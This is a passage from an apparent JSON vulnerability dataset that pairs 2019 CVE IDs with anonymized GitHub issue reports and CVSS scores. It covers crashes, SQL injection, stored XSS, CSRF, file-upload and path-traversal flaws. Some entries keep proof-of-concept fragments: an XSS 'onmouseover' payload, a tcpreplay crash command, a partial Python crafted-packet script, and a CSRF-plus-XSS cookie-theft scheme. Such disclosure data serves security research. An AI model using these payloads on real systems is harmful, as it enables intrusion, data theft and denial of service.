  44571. "Issue_Created_At": "2019-02-12T09:07:37Z",
  44572. "description": "NULL pointer dereference in APITAG . Description we observed a NULL pointer dereference occured in function get_layer NUMBERTAG located at get.c APITAG same be triggered by sending a crafted pcap file to the tcpreplay edit binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command tcpreplay edit r NUMBERTAG s NUMBERTAG b C m NUMBERTAG P oneatatime i $INTERFACE $POC POC REPRODUCER URLTAG Debug GDB ERRORTAG",
  44573. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44574. "severity": "HIGH",
  44575. "baseScore": 7.8,
  44576. "impactScore": 5.9,
  44577. "exploitabilityScore": 1.8
  44578. },
  44579. {
  44580. "CVE_ID": "CVE-2019-8377",
  44581. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/536",
  44582. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/536",
  44583. "Repo_new": "appneta/tcpreplay",
  44584. "Issue_Created_At": "2019-02-07T06:58:32Z",
  44585. "description": "NULL pointer dereference APITAG Description we observed a NULL pointer dereference occured in function APITAG located at APITAG APITAG same be triggered by sending a crafted pcap file to the tcpreplay edit binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command tcpreplay edit r NUMBERTAG s NUMBERTAG b C m NUMBERTAG P oneatatime i $INTERFACE $POC POC REPRODUCER URLTAG Debug GDB ERRORTAG",
  44586. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44587. "severity": "HIGH",
  44588. "baseScore": 7.8,
  44589. "impactScore": 5.9,
  44590. "exploitabilityScore": 1.8
  44591. },
  44592. {
  44593. "CVE_ID": "CVE-2019-8378",
  44594. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/363",
  44595. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/363",
  44596. "Repo_new": "axiomatic-systems/bento4",
  44597. "Issue_Created_At": "2019-01-29T07:09:12Z",
  44598. "description": "A heap buffer overflow occured in function APITAG Description we observed a heap buffer overflow occured in function APITAG located in APITAG APITAG same be triggered by sending a crafted file to the podofoimpose binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command APITAG POC REPRODUCER URLTAG Degub ASAN REPORT ERRORTAG ERRORTAG",
  44599. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44600. "severity": "HIGH",
  44601. "baseScore": 8.8,
  44602. "impactScore": 5.9,
  44603. "exploitabilityScore": 2.8
  44604. },
  44605. {
  44606. "CVE_ID": "CVE-2019-8380",
  44607. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/366",
  44608. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/366",
  44609. "Repo_new": "axiomatic-systems/bento4",
  44610. "Issue_Created_At": "2019-02-07T06:32:20Z",
  44611. "description": "NULL POINTER DEREFERENCE in APITAG Description we observed a NULL pointer dereference occured in APITAG located in APITAG APITAG same be triggered by sending a crafted file to the mp4dump binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command APITAG POC REPRODUCER URLTAG Debug GDB ERRORTAG",
  44612. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44613. "severity": "HIGH",
  44614. "baseScore": 8.8,
  44615. "impactScore": 5.9,
  44616. "exploitabilityScore": 2.8
  44617. },
  44618. {
  44619. "CVE_ID": "CVE-2019-8381",
  44620. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/538",
  44621. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/538",
  44622. "Repo_new": "appneta/tcpreplay",
  44623. "Issue_Created_At": "2019-02-12T17:10:10Z",
  44624. "description": "Invalid memory access in APITAG . Description we observed that there is an Invalid memory access at APITAG in APITAG APITAG same be triggered by sending a crafted pcap file to the tcpreplay edit binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command tcpreplay edit r NUMBERTAG s NUMBERTAG b C m NUMBERTAG P oneatatime i $INTERFACE $POC POC REPRODUCER URLTAG Debug GDB ERRORTAG",
  44625. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44626. "severity": "HIGH",
  44627. "baseScore": 7.8,
  44628. "impactScore": 5.9,
  44629. "exploitabilityScore": 1.8
  44630. },
  44631. {
  44632. "CVE_ID": "CVE-2019-8393",
  44633. "Issue_Url_old": "https://github.com/FantasticLBP/Hotels_Server/issues/4",
  44634. "Issue_Url_new": "https://github.com/fantasticlbp/hotels_server/issues/4",
  44635. "Repo_new": "fantasticlbp/hotels_server",
  44636. "Issue_Created_At": "2019-02-17T05:50:57Z",
  44637. "description": "APITAG through NUMBERTAG has SQL Injection via the API.. In PATHTAG It will receive a parameter called \"telephone\" to search for existed users. But in fact,this parameter just become a part of the SQL request without any process,so it will be possible to have a SQL injection. We can use SQLMAP to test this vulnerability: FILETAG FILETAG FILETAG",
  44638. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44639. "severity": "CRITICAL",
  44640. "baseScore": 9.8,
  44641. "impactScore": 5.9,
  44642. "exploitabilityScore": 3.9
  44643. },
  44644. {
  44645. "CVE_ID": "CVE-2019-8408",
  44646. "Issue_Url_old": "https://github.com/Self-Evident/OneFileCMS/issues/51",
  44647. "Issue_Url_new": "https://github.com/self-evident/onefilecms/issues/51",
  44648. "Repo_new": "self-evident/onefilecms",
  44649. "Issue_Created_At": "2019-01-29T06:16:32Z",
  44650. "description": "onefilecms.php in APITAG can be illegally modified. APITAG FILETAG by username/password , then click APITAG master'. FILETAG APITAG click APITAG FILETAG APITAG can see that there is no permission to edit APITAG And then click 'copy'. FILETAG APITAG to do ,and click 'copy' again. FILETAG APITAG you can see ,the file is ready for editing and saving. As following picture shows. FILETAG",
  44651. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  44652. "severity": "MEDIUM",
  44653. "baseScore": 4.9,
  44654. "impactScore": 3.6,
  44655. "exploitabilityScore": 1.2
  44656. },
  44657. {
  44658. "CVE_ID": "CVE-2019-8411",
  44659. "Issue_Url_old": "https://github.com/615/VulnPoC/issues/1",
  44660. "Issue_Url_new": "https://github.com/615/vulnpoc/issues/1",
  44661. "Repo_new": "615/vulnpoc",
  44662. "Issue_Created_At": "2019-01-09T09:41:42Z",
  44663. "description": "zzcms NUMBERTAG data NUMBERTAG link: FILETAG FILETAG Edition: zzcms NUMBERTAG data NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG There is unlink($fp) to delete any file by controlloing the value of $_GET FILETAG so we can delete APITAG",
  44664. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  44665. "severity": "HIGH",
  44666. "baseScore": 7.5,
  44667. "impactScore": 3.6,
  44668. "exploitabilityScore": 3.9
  44669. },
  44670. {
  44671. "CVE_ID": "CVE-2019-8419",
  44672. "Issue_Url_old": "https://github.com/tamlok/vnote/issues/564",
  44673. "Issue_Url_new": "https://github.com/vnotex/vnote/issues/564",
  44674. "Repo_new": "vnotex/vnote",
  44675. "Issue_Created_At": "2019-01-05T08:37:36Z",
  44676. "description": "We found a stored xss vulnerability in vnote. Hello friend\uff0cwe are farmsec security team\uff0cwe found a stored xss vulnerability in vnote\uff1a OS Version : Linux APITAG Version APITAG NUMBERTAG Symptoms : APITAG app does not filter specific html tags\uff0cas\uff1a APITAG APITAG APITAG NUMBERTAG An attacker can execute a javascript script by using a malicious html tag. FILETAG How to Repro : APITAG vnote for linux URLTAG FILETAG APITAG New Note Fill in the notebook name FILETAG Click OK. APITAG folder FILETAG Click OK. APITAG text note FILETAG APITAG in the xss vulnerability test payload payload: APITAG APITAG note Enter Ctrl+T FILETAG The code is executed in the browser",
  44677. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44678. "severity": "MEDIUM",
  44679. "baseScore": 6.1,
  44680. "impactScore": 2.7,
  44681. "exploitabilityScore": 2.8
  44682. },
  44683. {
  44684. "CVE_ID": "CVE-2019-8421",
  44685. "Issue_Url_old": "https://github.com/bagesoft/bagecms/issues/5",
  44686. "Issue_Url_new": "https://github.com/bagesoft/bagecms/issues/5",
  44687. "Repo_new": "bagesoft/bagecms",
  44688. "Issue_Created_At": "2019-02-13T12:50:34Z",
  44689. "description": "SQL injection vulnerability can inject user data. URL\uff1a FILETAG There are two parameters in the file that may be injected. Controller at PATHTAG FILETAG FILETAG FILETAG There is no parameter filtering here, and these parameters are brought into the database for query, then there may be a SQL injection vulnerability here. Find the location of the vulnerability url\uff1a URLTAG FILETAG Impact parameters: Title How to affect the parameter title, click on the query, and view the request package through the burst suite. Vulnerability POC Request Package: GET APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,zh CN; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG DNT NUMBERTAG Recurring steps NUMBERTAG First enter the website background management page NUMBERTAG Go to the content, content management page. FILETAG There is a query button at the top right to query NUMBERTAG burp suite capture packet analysis. FILETAG Inject test on the tittlealias Use sqlmap to verify that there is an injection point. FILETAG",
  44690. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  44691. "severity": "HIGH",
  44692. "baseScore": 7.2,
  44693. "impactScore": 5.9,
  44694. "exploitabilityScore": 1.2
  44695. },
  44696. {
  44697. "CVE_ID": "CVE-2019-8433",
  44698. "Issue_Url_old": "https://github.com/jetiben/jtbc/issues/6",
  44699. "Issue_Url_new": "https://github.com/jetiben/jtbc/issues/6",
  44700. "Repo_new": "jetiben/jtbc",
  44701. "Issue_Created_At": "2019-01-07T08:16:42Z",
  44702. "description": "Bug: file upload Vulnerability. There is an file upload vulnerability in your latest version of the CMS NUMBERTAG In URLTAG \uff0cupload the file FILETAG document content \uff1a FILETAG FILETAG APITAG To Reproduce: Open below URL in browser which supports flash. url: URLTAG upload FILETAG exp: FILETAG APITAG Fi NUMBERTAG erify the file name suffix and limit the uploading (php, jsp, aspx) scripts NUMBERTAG Set the upload whitelist, only allow uploading whitelist (jpg, png, gif) and other file types NUMBERTAG Set file storage directory permissions, prohibit file upload directory for script parsing.",
  44703. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  44704. "severity": "HIGH",
  44705. "baseScore": 7.5,
  44706. "impactScore": 3.6,
  44707. "exploitabilityScore": 3.9
  44708. },
  44709. {
  44710. "CVE_ID": "CVE-2019-8435",
  44711. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/3",
  44712. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/3",
  44713. "Repo_new": "gaozhifeng/phpmywind",
  44714. "Issue_Created_At": "2019-01-09T05:50:37Z",
  44715. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an xss vulnerability in your latest version of the NUMBERTAG In the PATHTAG FILETAG APITAG To Reproduce: FILETAG FILETAG Fi NUMBERTAG Strictly verify user input, you must perform strict checks and html escape escaping on all input scripts, iframes, etc. The input here is not only the input interface that the user can directly interact with, but also the variables in the HTTP request in the HTTP request, the variables in the HTTP request header, and so on NUMBERTAG erify the data type and verify its format, length, scope, and content NUMBERTAG Not only need to be verified on the client side but also on the server side NUMBERTAG The output data should also be checked. The values in the database may be output in multiple places on a large website. Even if the input is coded, the security check should be performed at the output points.",
  44716. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  44717. "severity": "MEDIUM",
  44718. "baseScore": 4.8,
  44719. "impactScore": 2.7,
  44720. "exploitabilityScore": 1.7
  44721. },
  44722. {
  44723. "CVE_ID": "CVE-2019-8437",
  44724. "Issue_Url_old": "https://github.com/beyond7176/njiandan-cms/issues/1",
  44725. "Issue_Url_new": "https://github.com/beyond7176/njiandan-cms/issues/1",
  44726. "Repo_new": "beyond7176/njiandan-cms",
  44727. "Issue_Created_At": "2019-01-09T10:01:18Z",
  44728. "description": "BUG: CSRF vulnerability. There is an CSRF vulnerability in your CMS Log in as an admin Inducing the admin to click on the link success add an administrator. POC CODETAG FILETAG APITAG FI NUMBERTAG erify the HTTP Referer field NUMBERTAG Add a token to the request address and verify (the token is not placed in the cookie, placed in the http request parameter, and the server verifies it NUMBERTAG Add the token to the http header attribute to prevent the token from appearing in the browser and being leaked.",
  44729. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44730. "severity": "HIGH",
  44731. "baseScore": 8.8,
  44732. "impactScore": 5.9,
  44733. "exploitabilityScore": 2.8
  44734. },
  44735. {
  44736. "CVE_ID": "CVE-2019-8438",
  44737. "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/61",
  44738. "Issue_Url_new": "https://github.com/chekun/dilicms/issues/61",
  44739. "Repo_new": "chekun/dilicms",
  44740. "Issue_Created_At": "2019-01-10T02:43:25Z",
  44741. "description": "Stored XSS Vulnerability Found in System setting > site setting > APITAG APITAG the backstage FILETAG NUMBERTAG Go to System setting >site setting FILETAG NUMBERTAG add the following payload to the first textbox\uff0cand submit\u3002 APITAG APITAG APITAG alert NUMBERTAG APITAG FILETAG And then Stored XSS triggered",
  44742. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  44743. "severity": "MEDIUM",
  44744. "baseScore": 4.8,
  44745. "impactScore": 2.7,
  44746. "exploitabilityScore": 1.7
  44747. },
  44748. {
  44749. "CVE_ID": "CVE-2019-8439",
  44750. "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/62",
  44751. "Issue_Url_new": "https://github.com/chekun/dilicms/issues/62",
  44752. "Repo_new": "chekun/dilicms",
  44753. "Issue_Created_At": "2019-01-10T03:09:01Z",
  44754. "description": "Stored XSS Vulnerability Found in System setting > site setting > APITAG APITAG the backstage FILETAG NUMBERTAG Go to System setting >site setting FILETAG NUMBERTAG add the following payload to the second textbox\uff0cand submit\u3002 payload\uff1asite_domain= FILETAG \" onmouseover=\"alert NUMBERTAG FILETAG And move your mouse on the second textbook \uff0cthen Stored XSS triggered",
  44755. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  44756. "severity": "MEDIUM",
  44757. "baseScore": 5.4,
  44758. "impactScore": 2.7,
  44759. "exploitabilityScore": 2.3
  44760. },
  44761. {
  44762. "CVE_ID": "CVE-2019-8440",
  44763. "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/63",
  44764. "Issue_Url_new": "https://github.com/chekun/dilicms/issues/63",
  44765. "Repo_new": "chekun/dilicms",
  44766. "Issue_Created_At": "2019-01-10T03:16:54Z",
  44767. "description": "Stored XSS Vulnerability Found in System setting > site setting > APITAG APITAG the backstage FILETAG NUMBERTAG Go to System setting >site setting FILETAG NUMBERTAG add the following payload to the third textbox\uff0cand submit\u3002 APITAG onmouseover=\"alert NUMBERTAG FILETAG And move your mouse on the third textbook \uff0cthen Stored XSS triggered",
  44768. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  44769. "severity": "MEDIUM",
  44770. "baseScore": 4.8,
  44771. "impactScore": 2.7,
  44772. "exploitabilityScore": 1.7
  44773. },
  44774. {
  44775. "CVE_ID": "CVE-2019-8902",
  44776. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/56",
  44777. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/56",
  44778. "Repo_new": "idreamsoft/iCMS",
  44779. "Issue_Created_At": "2019-02-18T11:14:06Z",
  44780. "description": "A CSRF vulnerability exists in iCMS NUMBERTAG When the users login in, he can add an link URL in the article. Then the other users open the link URL will cause CSRF. POC NUMBERTAG html delete users' articles ERRORTAG",
  44781. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
  44782. "severity": "MEDIUM",
  44783. "baseScore": 5.7,
  44784. "impactScore": 3.6,
  44785. "exploitabilityScore": 2.1
  44786. },
  44787. {
  44788. "CVE_ID": "CVE-2019-8908",
  44789. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/3",
  44790. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/3",
  44791. "Repo_new": "taosir/wtcms",
  44792. "Issue_Created_At": "2019-02-18T07:33:00Z",
  44793. "description": "An issue was discovered in APITAG there is an Backstage editor getshell Vulnerability. The attacker opens Setting Mailbox configuration Registration email template,upload the image through the editor, burbsuite capture the package and change the Suffix, you can upload any file. FILETAG FILETAG FILETAG FILETAG",
  44794. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44795. "severity": "CRITICAL",
  44796. "baseScore": 9.8,
  44797. "impactScore": 5.9,
  44798. "exploitabilityScore": 3.9
  44799. },
  44800. {
  44801. "CVE_ID": "CVE-2019-8909",
  44802. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/6",
  44803. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/6",
  44804. "Repo_new": "taosir/wtcms",
  44805. "Issue_Created_At": "2019-02-18T11:01:34Z",
  44806. "description": "The background verification code size can be controlled to cause a denial of service attack.. APITAG click to view the verification code image address APITAG width and height in the url APITAG burpsuite to fetch data and see the size of the returned package APITAG modifying the length and width values and seeing the size of the returned package APITAG the above test, we know that the vulnerability exists. If we send a NUMBERTAG packet to the server and the server takes NUMBERTAG s to process, then if we send NUMBERTAG packets NUMBERTAG s That is, the server takes NUMBERTAG s to process. When we send NUMBERTAG such packets (of course, you should never throw them with NUMBERTAG packets. Generally speaking NUMBERTAG test results can lead to website crashes.) FILETAG FILETAG FILETAG FILETAG",
  44807. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44808. "severity": "HIGH",
  44809. "baseScore": 7.5,
  44810. "impactScore": 3.6,
  44811. "exploitabilityScore": 3.9
  44812. },
  44813. {
  44814. "CVE_ID": "CVE-2019-8910",
  44815. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/5",
  44816. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/5",
  44817. "Repo_new": "taosir/wtcms",
  44818. "Issue_Created_At": "2019-02-18T10:29:15Z",
  44819. "description": "Csrf + Xss combination Can be obtained administrator cookie. Place of backstage set up website information exists Csrf Vulnerability,attacker Structure a csrf APITAG the administrator clicks on the malicious link, the site information is automatically changed. There is still an xss in the place of the website statistics code. FILETAG We can write an xss first, and then construct the csrf code, so that after the webmaster clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the administrator visits the homepage of the website, he can get him Cookie CSRF Exp: CODETAG FILETAG",
  44820. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44821. "severity": "HIGH",
  44822. "baseScore": 8.8,
  44823. "impactScore": 5.9,
  44824. "exploitabilityScore": 2.8
  44825. },
  44826. {
  44827. "CVE_ID": "CVE-2019-8919",
  44828. "Issue_Url_old": "https://github.com/haiwen/seadroid/issues/789",
  44829. "Issue_Url_new": "https://github.com/haiwen/seadroid/issues/789",
  44830. "Repo_new": "haiwen/seadroid",
  44831. "Issue_Created_At": "2019-02-18T13:09:10Z",
  44832. "description": "IV should be randomness and unpredictable. When using client side encryption, for one encrypted library, the IV is stored and the client program always uses this one IV to encrypt and decrypt different files. IV reused is unsafe and should not be used, the IV should be randomness and unpredictable. ( CVETAG : CVETAG These are Debug details for three different files when decrypting them in the client APITAG side: File1: Cipher MENTIONTAG APITAG File2: Cipher MENTIONTAG APITAG File3: Cipher MENTIONTAG APITAG",
  44833. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  44834. "severity": "HIGH",
  44835. "baseScore": 7.5,
  44836. "impactScore": 3.6,
  44837. "exploitabilityScore": 3.9
  44838. },
  44839. {
  44840. "CVE_ID": "CVE-2019-8939",
  44841. "Issue_Url_old": "https://github.com/Tautulli/Tautulli-Issues/issues/161",
  44842. "Issue_Url_new": "https://github.com/tautulli/tautulli-issues/issues/161",
  44843. "Repo_new": "tautulli/tautulli-issues",
  44844. "Issue_Created_At": "2019-02-19T15:15:29Z",
  44845. "description": "Insufficient username filtering in FILETAG allows XSS and data exfiltration. Version NUMBERTAG What you did? I changed my Plex username to APITAG . What happened? Tautulli does filter APITAG and when someone visits the History page, it's executed in the context of whichever user is logged in, probably the server admin. Lines NUMBERTAG are vulnerable: URLTAG Here we can see how it is reflected: CODETAG What you expected? I didn't expect my friend's Plex server to leak a bunch of information at me. How can we reproduce your issue? Setup a Plex Media Server, Install Tautulli, create a normal Plex user account to consume media. Change the user account name to something with APITAG Visit the Tautulli History page.",
  44846. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44847. "severity": "MEDIUM",
  44848. "baseScore": 6.1,
  44849. "impactScore": 2.7,
  44850. "exploitabilityScore": 2.8
  44851. },
  44852. {
  44853. "CVE_ID": "CVE-2019-8944",
  44854. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5315",
  44855. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5315",
  44856. "Repo_new": "octopusdeploy/issues",
  44857. "Issue_Created_At": "2019-02-19T23:08:37Z",
  44858. "description": "Save terraform sensitive values as Octopus sensitive values. Sensitive Terraform output variables are saved and exposed as regular variables, and printed in the logs. For example, if you deploy the following Terraform template: APITAG The value hi would appear in the logs.",
  44859. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  44860. "severity": "MEDIUM",
  44861. "baseScore": 6.5,
  44862. "impactScore": 3.6,
  44863. "exploitabilityScore": 2.8
  44864. },
  44865. {
  44866. "CVE_ID": "CVE-2019-8944",
  44867. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5314",
  44868. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5314",
  44869. "Repo_new": "octopusdeploy/issues",
  44870. "Issue_Created_At": "2019-02-19T23:00:07Z",
  44871. "description": "Save terraform sensitive values as Octopus sensitive values. Sensitive Terraform output variables are saved and exposed as regular variables, and printed in the logs. For example, if you deploy the following Terraform template: APITAG The value hi would appear in the logs.",
  44872. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  44873. "severity": "MEDIUM",
  44874. "baseScore": 6.5,
  44875. "impactScore": 3.6,
  44876. "exploitabilityScore": 2.8
  44877. },
  44878. {
  44879. "CVE_ID": "CVE-2019-9002",
  44880. "Issue_Url_old": "https://github.com/mikelbring/tinyissue/issues/237",
  44881. "Issue_Url_new": "https://github.com/mikelbring/tinyissue/issues/237",
  44882. "Repo_new": "mikelbring/tinyissue",
  44883. "Issue_Created_At": "2019-02-20T01:56:44Z",
  44884. "description": "There is a security problem that can getshell. problem file at FILETAG line NUMBERTAG config_file = str_replace('localhost', $_POST FILETAG",
  44885. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44886. "severity": "CRITICAL",
  44887. "baseScore": 9.8,
  44888. "impactScore": 5.9,
  44889. "exploitabilityScore": 3.9
  44890. },
  44891. {
  44892. "CVE_ID": "CVE-2019-9004",
  44893. "Issue_Url_old": "https://github.com/eclipse/wakaama/issues/425",
  44894. "Issue_Url_new": "https://github.com/eclipse/wakaama/issues/425",
  44895. "Repo_new": "eclipse/wakaama",
  44896. "Issue_Created_At": "2019-02-18T16:50:03Z",
  44897. "description": "Memory leak while processing crafted packet. Wakaama LWM2M server incorrectly handles incoming packets leading to a memory leak. Processing of the single crafted packet leads to leaking (wasting NUMBERTAG bytes of memory. This can lead to stopping of the LWM2M server after exhausting all available memory. Depending on server configuration and isolation of services, this can stop also other processes on the same server. Proposed CVSS NUMBERTAG Score: On systems with modern memory protection and isolation of services NUMBERTAG medium) PATHTAG On systems with lower memory protection and no isolation of services NUMBERTAG high) PATHTAG Reproduction NUMBERTAG Wakaama must be compiled with Leak Sanitizer (or other similar tool) by setting compilation flag: C_FLAGS = fsanitize=address NUMBERTAG Run Wakaama server as: lwm2mserver NUMBERTAG l NUMBERTAG Run following Python2 script (running multiple times will show larger leak): import sys import socket WAKAAMA_PAYLOAD NUMBERTAG e6e2e2e NUMBERTAG b NUMBERTAG out_data = APITAG s = APITAG APITAG ) s.sendto(out_data, APITAG APITAG Execution of the script: python2 wakaama_test.py dst_ip dst_port (where: dst_ip and dst_port are IP and port of tested Wakaama server) e.g.: sudo python wakaama_test.py APITAG NUMBERTAG Close the lwm2mserver to get report from Leak Sanitizer NUMBERTAG bytes received from NUMBERTAG E6 E2 E2 E NUMBERTAG B NUMBERTAG D......g.rd. ^C APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4fa NUMBERTAG b NUMBERTAG in malloc ( PATHTAG NUMBERTAG f1df in lwm2m_malloc ( PATHTAG NUMBERTAG ad6 in coap_add_multi_option ( PATHTAG NUMBERTAG f in coap_parse_message ( PATHTAG NUMBERTAG aac in lwm2m_handle_packet ( PATHTAG NUMBERTAG e2 in main ( PATHTAG NUMBERTAG f4fa NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
  44898. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44899. "severity": "HIGH",
  44900. "baseScore": 7.5,
  44901. "impactScore": 3.6,
  44902. "exploitabilityScore": 3.9
  44903. },
  44904. {
  44905. "CVE_ID": "CVE-2019-9015",
  44906. "Issue_Url_old": "https://github.com/yangsuda/mopcms/issues/1",
  44907. "Issue_Url_new": "https://github.com/yangsuda/mopcms/issues/1",
  44908. "Repo_new": "yangsuda/mopcms",
  44909. "Issue_Created_At": "2019-02-22T05:58:38Z",
  44910. "description": "There is a Path Traversal vulnerability that can delete unexpected critical files. Vulnerability description A Path Traversal vulnerability was discovered in mopcms which is able to delete unexpected critical files. The exploit point is in the \"column management\" function. The path added to the column is not verified. When the column is deleted by attacker, the corresponding directory is deleted. POC Firstly, create a column and edit the path as './' FILETAG And delete the column FILETAG Result FILETAG",
  44911. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  44912. "severity": "CRITICAL",
  44913. "baseScore": 9.1,
  44914. "impactScore": 5.2,
  44915. "exploitabilityScore": 3.9
  44916. },
  44917. {
  44918. "CVE_ID": "CVE-2019-9016",
  44919. "Issue_Url_old": "https://github.com/yangsuda/mopcms/issues/2",
  44920. "Issue_Url_new": "https://github.com/yangsuda/mopcms/issues/2",
  44921. "Repo_new": "yangsuda/mopcms",
  44922. "Issue_Created_At": "2019-02-22T06:35:29Z",
  44923. "description": "There is a stored XSS vulnerability. Vulnerability description A xss vulnerability was discovered in mopcms. There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form FILETAG FILETAG FILETAG",
  44924. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44925. "severity": "MEDIUM",
  44926. "baseScore": 6.1,
  44927. "impactScore": 2.7,
  44928. "exploitabilityScore": 2.8
  44929. },
  44930. {
  44931. "CVE_ID": "CVE-2019-9026",
  44932. "Issue_Url_old": "https://github.com/tbeu/matio/issues/103",
  44933. "Issue_Url_new": "https://github.com/tbeu/matio/issues/103",
  44934. "Repo_new": "tbeu/matio",
  44935. "Issue_Created_At": "2019-02-20T02:24:30Z",
  44936. "description": "some memory corruption problems when the library parse the mat file.. I found several memory corruption problem in the library. More details can be found at here URLTAG .",
  44937. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44938. "severity": "HIGH",
  44939. "baseScore": 7.5,
  44940. "impactScore": 3.6,
  44941. "exploitabilityScore": 3.9
  44942. },
  44943. {
  44944. "CVE_ID": "CVE-2019-9048",
  44945. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/69",
  44946. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/69",
  44947. "Repo_new": "pluck-cms/pluck",
  44948. "Issue_Created_At": "2019-02-18T07:08:41Z",
  44949. "description": "Four CSRF vulnerabilities in pluck cms NUMBERTAG One: use CSRF vulnerability to delete pictures Vulnerability details: When the administrator logs in, opening the webpage will automatically delete the specified image. Vulnerability url: URLTAG Vulnerability POC: APITAG Two: use the CSRF vulnerability to delete the topic Vulnerability details: When the administrator logs in, opening the web page will automatically delete the specified topic. Vulnerability url: URLTAG Vulnerability POC: APITAG Three: use CSRF vulnerability to remove the module Vulnerability details: When the administrator logs in, open the webpage and the specified module will be deleted automatically. Vulnerability url: URLTAG Vulnerability POC: APITAG Four: use CSRF vulnerability to delete pictures Vulnerability details: When the administrator logs in, opening the web page will automatically delete the specified article. Vulnerability url: URLTAG Vulnerability POC: APITAG Vulnerability suggestions: One: Detect user submissions by referer, token, or verification code. Second: It is best to use the post 